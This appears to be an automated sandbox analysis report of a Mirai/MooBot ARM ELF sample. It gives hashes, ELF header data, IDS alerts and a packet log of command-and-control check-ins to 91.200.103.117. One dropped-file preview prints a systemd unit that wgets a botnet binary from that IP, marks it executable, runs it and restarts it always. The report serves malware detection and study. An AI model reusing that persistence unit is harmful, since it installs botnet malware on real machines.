                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                      • 194.59.31.31
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      • 194.59.31.225
                                      9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                      • 194.59.30.201
                                      6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                      • 194.59.30.201
                                      No context
                                      No context
                                      Process:/tmp/na.elf
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):296
                                      Entropy (8bit):5.0514883747404
                                      Encrypted:false
                                      SSDEEP:6:z80WuKyRZAMzdK+ann0RJ5R0pp+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRS+GWRg+GWRuwjp+GWRut
                                      MD5:0BD8BD7B39BF18B43F0DF83743017F40
                                      SHA1:D5AD9A70283FF89F7C2BB7B0FF5F2A4A18EF152E
                                      SHA-256:C7F82B189E4D250C2E5DE933F3F03D766B2A3BD5A0F7881B822A5F55C6494536
                                      SHA-512:486F4B7CA2B0E241B42415F70F118A7CE0BBA0143BCCE1334FB9806E29F16A42F4AFD90EB10D99E471926633334988007A93FD46FCF1F2EF852BB90637714E3A
                                      Malicious:false
                                      Reputation:low
                                      Preview:[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetarm.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.
                                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):76
                                      Entropy (8bit):3.7627880354948586
                                      Encrypted:false
                                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                      Process:/tmp/na.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):27
                                      Entropy (8bit):3.8100810205217304
                                      Encrypted:false
                                      SSDEEP:3:TgBDlT1N:TgB11N
                                      MD5:2E8B62CD5B9D6203300E1A0F79554430
                                      SHA1:B6FC563BCA171C6DFA5A420C367F090C08635F4D
                                      SHA-256:54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
                                      SHA-512:81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
                                      Malicious:false
                                      Reputation:low
                                      Preview:/tmp/na.elf./tmp/nwlrbbmqbh
                                      File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                      Entropy (8bit):5.582655267042873
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:na.elf
                                      File size:142'080 bytes
                                      MD5:47b283fe2b62434075319b4e9ca076de
                                      SHA1:0b8a05062078824a5c64972d6281d350b5b7ad10
                                      SHA256:a364e8acff9c109c29a70ea35f6b27cb08ef74cd45fd8418c6e459edbe258b1c
                                      SHA512:49496c8b4fea6b35a5ca0c7b21ce9e85c076896bfdf6f4d33028a9b68d1a21f7263b7dd221caf95476561ec9a23f37f5e4fda574e32ff2912c7eddc21c774065
                                      SSDEEP:1536:B5WiGtiNJQv30GQZaBelvC6atxRa2bka4VAb9fTx0kvA23HJLqGE9l5qwywFCFDy:B5Wi0ib8avCTRaA4+BV0kvAkW+9m7p
                                      TLSH:88D32A45FC415F23C6D612BBFB5E428D372A17A8D2EE72039D216F25378A96B0E37142
                                      File Content Preview:.ELF...a..........(.........4...p)......4. ...(.....................................................0I..............Q.td..................................-...L."...qm..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                      ELF header

                                      Class:ELF32
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:ARM
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:ARM - ABI
                                      ABI Version:0
                                      Entry Point Address:0x8190
                                      Flags:0x202
                                      ELF Header Size:52
                                      Program Header Offset:52
                                      Program Header Size:32
                                      Number of Program Headers:3
                                      Section Header Offset:141680
                                      Section Header Size:40
                                      Number of Section Headers:10
                                      Header String Table Index:9
                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                      NULL0x00x00x00x00x0000
                                      .initPROGBITS0x80940x940x180x00x6AX004
                                      .textPROGBITS0x80b00xb00x1b5fc0x00x6AX0016
                                      .finiPROGBITS0x236ac0x1b6ac0x140x00x6AX004
                                      .rodataPROGBITS0x236c00x1b6c00x290c0x00x2A004
                                      .ctorsPROGBITS0x2e0000x1e0000xc0x00x3WA004
                                      .dtorsPROGBITS0x2e00c0x1e00c0x80x00x3WA004
                                      .dataPROGBITS0x2e0200x1e0200x49100x00x3WA0032
                                      .bssNOBITS0x329300x229300x86bc0x00x3WA004
                                      .shstrtabSTRTAB0x00x229300x3e0x00x0001
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x80000x80000x1dfcc0x1dfcc6.06710x5R E0x8000.init .text .fini .rodata
                                      LOAD0x1e0000x2e0000x2e0000x49300xcfec0.40400x6RW 0x8000.ctors .dtors .data .bss
                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-07T16:26:59.723365+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161691.200.103.11723561TCP
                                      2024-10-07T16:27:04.345846+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154161891.200.103.11723561TCP
                                      2024-10-07T16:27:09.026283+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162091.200.103.11723561TCP
                                      2024-10-07T16:27:20.647292+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162291.200.103.11723561TCP
                                      2024-10-07T16:27:24.335242+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162491.200.103.11723561TCP
                                      2024-10-07T16:27:33.965618+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162691.200.103.11723561TCP
                                      2024-10-07T16:27:37.604755+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154162891.200.103.11723561TCP
                                      2024-10-07T16:27:46.506480+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163091.200.103.11723561TCP
                                      2024-10-07T16:27:54.144610+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163291.200.103.11723561TCP
                                      2024-10-07T16:27:56.766969+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163491.200.103.11723561TCP
                                      2024-10-07T16:28:04.387884+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163691.200.103.11723561TCP
                                      2024-10-07T16:28:07.029462+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154163891.200.103.11723561TCP
                                      2024-10-07T16:28:10.818956+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164091.200.103.11723561TCP
                                      2024-10-07T16:28:13.488128+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164291.200.103.11723561TCP
                                      2024-10-07T16:28:24.114230+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164491.200.103.11723561TCP
                                      2024-10-07T16:28:34.803958+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164691.200.103.11723561TCP
                                      2024-10-07T16:28:43.824060+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154164891.200.103.11723561TCP
                                      2024-10-07T16:28:51.844240+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165091.200.103.11723561TCP
                                      2024-10-07T16:28:57.507766+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165291.200.103.11723561TCP
                                      2024-10-07T16:29:00.124032+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165491.200.103.11723561TCP
                                      2024-10-07T16:29:03.818952+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165691.200.103.11723561TCP
                                      2024-10-07T16:29:09.456097+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154165891.200.103.11723561TCP
                                      2024-10-07T16:29:21.265138+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166091.200.103.11723561TCP
                                      2024-10-07T16:29:28.886641+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166291.200.103.11723561TCP
                                      2024-10-07T16:29:40.562967+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166491.200.103.11723561TCP
                                      2024-10-07T16:29:45.542576+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154166891.200.103.11723561TCP
                                      2024-10-07T16:29:52.101309+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154167091.200.103.11723561TCP
                                      2024-10-07T16:29:56.715479+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154167291.200.103.11723561TCP
                                      2024-10-07T16:30:08.358601+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154167491.200.103.11723561TCP
                                      2024-10-07T16:30:12.001095+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154167691.200.103.11723561TCP
                                      2024-10-07T16:30:21.695401+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154167891.200.103.11723561TCP
                                      2024-10-07T16:30:28.314262+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.154168091.200.103.11723561TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 7, 2024 16:26:59.710159063 CEST4161623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:26:59.715035915 CEST235614161691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:26:59.715094090 CEST4161623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:26:59.723365068 CEST4161623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:26:59.729959965 CEST235614161691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:01.324934959 CEST235614161691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:01.325257063 CEST4161623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:01.330076933 CEST235614161691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:04.337846041 CEST4161823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:04.342880011 CEST235614161891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:04.343002081 CEST4161823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:04.345845938 CEST4161823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:04.351459026 CEST235614161891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:06.010437965 CEST235614161891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:06.011862993 CEST4161823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:06.016618967 CEST235614161891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:09.020903111 CEST4162023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:09.025732040 CEST235614162091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:09.025789976 CEST4162023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:09.026283026 CEST4162023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:09.031056881 CEST235614162091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:10.633145094 CEST235614162091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:10.633317947 CEST4162023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:10.638166904 CEST235614162091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:20.641895056 CEST4162223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:20.646696091 CEST235614162291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:20.646790981 CEST4162223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:20.647291899 CEST4162223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:20.651993990 CEST235614162291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:22.311726093 CEST235614162291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:22.311866999 CEST4162223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:22.317190886 CEST235614162291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:24.329672098 CEST4162423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:24.334520102 CEST235614162491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:24.334580898 CEST4162423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:24.335242033 CEST4162423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:24.340060949 CEST235614162491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:25.949435949 CEST235614162491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:25.949593067 CEST4162423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:25.954502106 CEST235614162491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:33.959592104 CEST4162623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:33.964394093 CEST235614162691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:33.964447975 CEST4162623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:33.965617895 CEST4162623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:33.970364094 CEST235614162691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:35.578926086 CEST235614162691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:35.579097986 CEST4162623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:35.583986044 CEST235614162691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:37.599246979 CEST4162823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:37.604125023 CEST235614162891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:37.604175091 CEST4162823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:37.604754925 CEST4162823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:37.609673023 CEST235614162891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:39.490330935 CEST235614162891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:39.490488052 CEST4162823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:39.491662979 CEST235614162891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:39.491698027 CEST4162823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:39.495582104 CEST235614162891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:46.500531912 CEST4163023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:46.505503893 CEST235614163091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:46.505587101 CEST4163023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:46.506479979 CEST4163023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:46.511457920 CEST235614163091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:48.128330946 CEST235614163091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:48.128474951 CEST4163023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:48.133785963 CEST235614163091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:54.138681889 CEST4163223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:54.143721104 CEST235614163291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:54.143783092 CEST4163223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:54.144609928 CEST4163223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:54.149669886 CEST235614163291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:55.747867107 CEST235614163291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:55.748012066 CEST4163223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:55.753277063 CEST235614163291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:56.759784937 CEST4163423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:56.765661955 CEST235614163491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:56.765738964 CEST4163423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:56.766968966 CEST4163423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:56.773219109 CEST235614163491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:58.369185925 CEST235614163491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:27:58.369481087 CEST4163423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:27:58.374380112 CEST235614163491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:04.382319927 CEST4163623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:04.387114048 CEST235614163691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:04.387168884 CEST4163623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:04.387883902 CEST4163623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:04.393944025 CEST235614163691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:06.014683008 CEST235614163691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:06.014856100 CEST4163623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:06.019731998 CEST235614163691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:07.023863077 CEST4163823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:07.028759003 CEST235614163891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:07.028829098 CEST4163823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:07.029462099 CEST4163823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:07.034240961 CEST235614163891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:08.655644894 CEST235614163891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:08.655829906 CEST4163823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:08.660629034 CEST235614163891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:10.813182116 CEST4164023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:10.818264961 CEST235614164091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:10.818320036 CEST4164023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:10.818955898 CEST4164023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:10.823689938 CEST235614164091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:12.473335981 CEST235614164091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:12.473470926 CEST4164023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:12.478471041 CEST235614164091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:13.482592106 CEST4164223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:13.487481117 CEST235614164291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:13.487543106 CEST4164223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:13.488127947 CEST4164223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:13.492906094 CEST235614164291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:15.089920044 CEST235614164291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:15.090172052 CEST4164223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:15.090172052 CEST4164223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:15.095038891 CEST235614164291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:24.108135939 CEST4164423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:24.113130093 CEST235614164491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:24.113212109 CEST4164423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:24.114229918 CEST4164423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:24.119079113 CEST235614164491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:25.786721945 CEST235614164491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:25.786912918 CEST4164423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:25.791821957 CEST235614164491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:34.798137903 CEST4164623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:34.803246021 CEST235614164691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:34.803304911 CEST4164623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:34.803957939 CEST4164623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:34.808742046 CEST235614164691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:34.808823109 CEST4164623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:34.809238911 CEST235614164691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:34.813891888 CEST235614164691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:43.818438053 CEST4164823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:43.823304892 CEST235614164891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:43.823367119 CEST4164823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:43.824059963 CEST4164823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:43.828528881 CEST235614164891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:43.828608036 CEST4164823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:43.828891039 CEST235614164891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:43.833431005 CEST235614164891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:51.838517904 CEST4165023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:51.843497038 CEST235614165091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:51.843592882 CEST4165023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:51.844239950 CEST4165023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:51.849040985 CEST235614165091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:53.486056089 CEST235614165091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:53.486248016 CEST4165023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:53.491142035 CEST235614165091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:57.500643969 CEST4165223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:57.505568027 CEST235614165291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:57.505655050 CEST4165223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:57.507766008 CEST4165223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:57.512610912 CEST235614165291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:59.103934050 CEST235614165291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:28:59.104145050 CEST4165223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:28:59.109083891 CEST235614165291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:00.118078947 CEST4165423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:00.122870922 CEST235614165491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:00.122997046 CEST4165423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:00.124032021 CEST4165423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:00.128846884 CEST235614165491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:01.797350883 CEST235614165491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:01.797553062 CEST4165423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:01.802520990 CEST235614165491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:03.812725067 CEST4165623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:03.817840099 CEST235614165691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:03.817908049 CEST4165623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:03.818952084 CEST4165623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:03.823978901 CEST235614165691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:05.439291000 CEST235614165691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:05.439560890 CEST4165623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:05.444343090 CEST235614165691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:09.449635983 CEST4165823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:09.455312014 CEST235614165891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:09.455377102 CEST4165823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:09.456096888 CEST4165823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:09.461266994 CEST235614165891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:11.127007961 CEST235614165891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:11.127193928 CEST4165823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:11.132057905 CEST235614165891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:21.258997917 CEST4166023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:21.264128923 CEST235614166091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:21.264195919 CEST4166023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:21.265137911 CEST4166023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:21.271286011 CEST235614166091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:22.869743109 CEST235614166091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:22.869954109 CEST4166023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:22.874721050 CEST235614166091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:28.878982067 CEST4166223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:28.883790970 CEST235614166291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:28.883860111 CEST4166223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:28.886641026 CEST4166223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:28.891649961 CEST235614166291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:30.547544003 CEST235614166291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:30.547724009 CEST4166223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:30.553085089 CEST235614166291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:40.557430983 CEST4166423561192.168.2.1591.200.103.117
